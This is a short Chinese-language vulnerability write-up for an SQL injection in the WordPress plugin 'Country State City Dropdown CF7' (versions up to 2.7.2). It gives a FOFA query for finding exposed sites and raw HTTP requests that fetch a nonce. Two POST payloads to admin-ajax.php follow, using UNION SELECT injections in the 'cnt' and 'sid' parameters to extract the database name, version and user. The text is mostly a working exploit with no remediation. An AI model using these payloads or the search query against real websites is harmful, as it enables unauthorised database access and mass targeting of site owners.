WordPress CF7插件cities存在SQL注入漏洞
<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>
<font style="color:rgb(38, 38, 38);">wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。WordPress CF7插件cities存在SQL注入漏洞</font>
<font style="color:rgb(38, 38, 38);">二、影响版本</font>
- <font style="color:rgb(38, 38, 38);"> Country State City Dropdown CF7 <= 2.7.2 </font>
<font style="color:rgb(38, 38, 38);">三、资产测绘</font>
- fofa
body="/wp-content/plugins/country-state-city-auto-dropdown/"
- 特征
四、漏洞复现
首先通过poc获取nonce值
GET / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
使用nonce值进行SQL注入 测试
POST /wp-admin/admin-ajax.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
action=tc_csca_get_states&nonce_ajax=f662a5f7d7&cnt=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-
POC2:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
action=tc_csca_get_cities&nonce_ajax=f662a5f7d7&sid=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-